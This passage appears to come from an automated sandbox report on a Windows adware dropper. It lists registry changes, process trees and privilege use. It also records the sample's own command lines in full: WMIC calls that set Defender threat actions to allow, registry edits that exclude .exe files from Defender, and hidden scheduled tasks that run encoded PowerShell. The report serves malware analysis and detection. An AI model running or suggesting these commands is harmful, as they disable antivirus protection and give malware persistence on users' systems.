Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	HrhavpK.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeHrhavpK.exe

pid	process
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
1860	powershell.EXE
1860	powershell.EXE
1860	powershell.EXE
592	powershell.exe
592	powershell.exe
592	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
2052	powershell.exe
2052	powershell.exe
2052	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
3748	powershell.EXE
3748	powershell.EXE
3748	powershell.EXE
2056	powershell.exe
2056	powershell.exe
2056	powershell.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe
4016	HrhavpK.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeIncreaseQuotaPrivilege	2224	WMIC.exe
Token: SeSecurityPrivilege	2224	WMIC.exe
Token: SeTakeOwnershipPrivilege	2224	WMIC.exe
Token: SeLoadDriverPrivilege	2224	WMIC.exe
Token: SeSystemProfilePrivilege	2224	WMIC.exe
Token: SeSystemtimePrivilege	2224	WMIC.exe
Token: SeProfSingleProcessPrivilege	2224	WMIC.exe
Token: SeIncBasePriorityPrivilege	2224	WMIC.exe
Token: SeCreatePagefilePrivilege	2224	WMIC.exe
Token: SeBackupPrivilege	2224	WMIC.exe
Token: SeRestorePrivilege	2224	WMIC.exe
Token: SeShutdownPrivilege	2224	WMIC.exe
Token: SeDebugPrivilege	2224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2224	WMIC.exe
Token: SeRemoteShutdownPrivilege	2224	WMIC.exe
Token: SeUndockPrivilege	2224	WMIC.exe
Token: SeManageVolumePrivilege	2224	WMIC.exe
Token: 33	2224	WMIC.exe
Token: 34	2224	WMIC.exe
Token: 35	2224	WMIC.exe
Token: 36	2224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2224	WMIC.exe
Token: SeSecurityPrivilege	2224	WMIC.exe
Token: SeTakeOwnershipPrivilege	2224	WMIC.exe
Token: SeLoadDriverPrivilege	2224	WMIC.exe
Token: SeSystemProfilePrivilege	2224	WMIC.exe
Token: SeSystemtimePrivilege	2224	WMIC.exe
Token: SeProfSingleProcessPrivilege	2224	WMIC.exe
Token: SeIncBasePriorityPrivilege	2224	WMIC.exe
Token: SeCreatePagefilePrivilege	2224	WMIC.exe
Token: SeBackupPrivilege	2224	WMIC.exe
Token: SeRestorePrivilege	2224	WMIC.exe
Token: SeShutdownPrivilege	2224	WMIC.exe
Token: SeDebugPrivilege	2224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2224	WMIC.exe
Token: SeRemoteShutdownPrivilege	2224	WMIC.exe
Token: SeUndockPrivilege	2224	WMIC.exe
Token: SeManageVolumePrivilege	2224	WMIC.exe
Token: 33	2224	WMIC.exe
Token: 34	2224	WMIC.exe
Token: 35	2224	WMIC.exe
Token: 36	2224	WMIC.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

044dddee4308c73a3d6d7cb710f209d4.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exepowershell.EXE

description	pid	process	target process
PID 912 wrote to memory of 3788	912	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 912 wrote to memory of 3788	912	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 912 wrote to memory of 3788	912	044dddee4308c73a3d6d7cb710f209d4.exe	SimplInst.exe
PID 3788 wrote to memory of 904	3788	SimplInst.exe	SimplInst.exe
PID 3788 wrote to memory of 904	3788	SimplInst.exe	SimplInst.exe
PID 3788 wrote to memory of 904	3788	SimplInst.exe	SimplInst.exe
PID 904 wrote to memory of 192	904	SimplInst.exe	cmd.exe
PID 904 wrote to memory of 192	904	SimplInst.exe	cmd.exe
PID 904 wrote to memory of 192	904	SimplInst.exe	cmd.exe
PID 192 wrote to memory of 2184	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 2184	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 2184	192	cmd.exe	forfiles.exe
PID 2184 wrote to memory of 640	2184	forfiles.exe	cmd.exe
PID 2184 wrote to memory of 640	2184	forfiles.exe	cmd.exe
PID 2184 wrote to memory of 640	2184	forfiles.exe	cmd.exe
PID 640 wrote to memory of 3724	640	cmd.exe	powershell.exe
PID 640 wrote to memory of 3724	640	cmd.exe	powershell.exe
PID 640 wrote to memory of 3724	640	cmd.exe	powershell.exe
PID 904 wrote to memory of 4072	904	SimplInst.exe	forfiles.exe
PID 904 wrote to memory of 4072	904	SimplInst.exe	forfiles.exe
PID 904 wrote to memory of 4072	904	SimplInst.exe	forfiles.exe
PID 3724 wrote to memory of 2224	3724	powershell.exe	WMIC.exe
PID 3724 wrote to memory of 2224	3724	powershell.exe	WMIC.exe
PID 3724 wrote to memory of 2224	3724	powershell.exe	WMIC.exe
PID 4072 wrote to memory of 2816	4072	forfiles.exe	cmd.exe
PID 4072 wrote to memory of 2816	4072	forfiles.exe	cmd.exe
PID 4072 wrote to memory of 2816	4072	forfiles.exe	cmd.exe
PID 2816 wrote to memory of 2968	2816	cmd.exe	reg.exe
PID 2816 wrote to memory of 2968	2816	cmd.exe	reg.exe
PID 2816 wrote to memory of 2968	2816	cmd.exe	reg.exe
PID 2816 wrote to memory of 2836	2816	cmd.exe	reg.exe
PID 2816 wrote to memory of 2836	2816	cmd.exe	reg.exe
PID 2816 wrote to memory of 2836	2816	cmd.exe	reg.exe
PID 192 wrote to memory of 2320	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 2320	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 2320	192	cmd.exe	forfiles.exe
PID 2320 wrote to memory of 2052	2320	forfiles.exe	cmd.exe
PID 2320 wrote to memory of 2052	2320	forfiles.exe	cmd.exe
PID 2320 wrote to memory of 2052	2320	forfiles.exe	cmd.exe
PID 2052 wrote to memory of 2256	2052	cmd.exe	powershell.exe
PID 2052 wrote to memory of 2256	2052	cmd.exe	powershell.exe
PID 2052 wrote to memory of 2256	2052	cmd.exe	powershell.exe
PID 2256 wrote to memory of 2836	2256	powershell.exe	WMIC.exe
PID 2256 wrote to memory of 2836	2256	powershell.exe	WMIC.exe
PID 2256 wrote to memory of 2836	2256	powershell.exe	WMIC.exe
PID 192 wrote to memory of 1576	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 1576	192	cmd.exe	forfiles.exe
PID 192 wrote to memory of 1576	192	cmd.exe	forfiles.exe
PID 1576 wrote to memory of 3228	1576	forfiles.exe	cmd.exe
PID 1576 wrote to memory of 3228	1576	forfiles.exe	cmd.exe
PID 1576 wrote to memory of 3228	1576	forfiles.exe	cmd.exe
PID 3228 wrote to memory of 2844	3228	cmd.exe	powershell.exe
PID 3228 wrote to memory of 2844	3228	cmd.exe	powershell.exe
PID 3228 wrote to memory of 2844	3228	cmd.exe	powershell.exe
PID 2844 wrote to memory of 816	2844	powershell.exe	WMIC.exe
PID 2844 wrote to memory of 816	2844	powershell.exe	WMIC.exe
PID 2844 wrote to memory of 816	2844	powershell.exe	WMIC.exe
PID 904 wrote to memory of 2840	904	SimplInst.exe	schtasks.exe
PID 904 wrote to memory of 2840	904	SimplInst.exe	schtasks.exe
PID 904 wrote to memory of 2840	904	SimplInst.exe	schtasks.exe
PID 904 wrote to memory of 344	904	SimplInst.exe	schtasks.exe
PID 904 wrote to memory of 344	904	SimplInst.exe	schtasks.exe
PID 904 wrote to memory of 344	904	SimplInst.exe	schtasks.exe
PID 1860 wrote to memory of 1568	1860	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\044dddee4308c73a3d6d7cb710f209d4.exe
"C:\Users\Admin\AppData\Local\Temp\044dddee4308c73a3d6d7cb710f209d4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Users\Admin\AppData\Local\Temp\7zS7B60.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\7zS7C3A.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:192

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:816

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2816

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:2968

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:2836

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJkwovHlK" /SC once /ST 05:16:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:2840

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJkwovHlK"
4⤵
PID:344

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJkwovHlK"
4⤵
PID:2268

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 09:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\HvCBxel.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1568

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3228

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\HvCBxel.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\HvCBxel.exe nv /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:3160

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:592

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2312

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
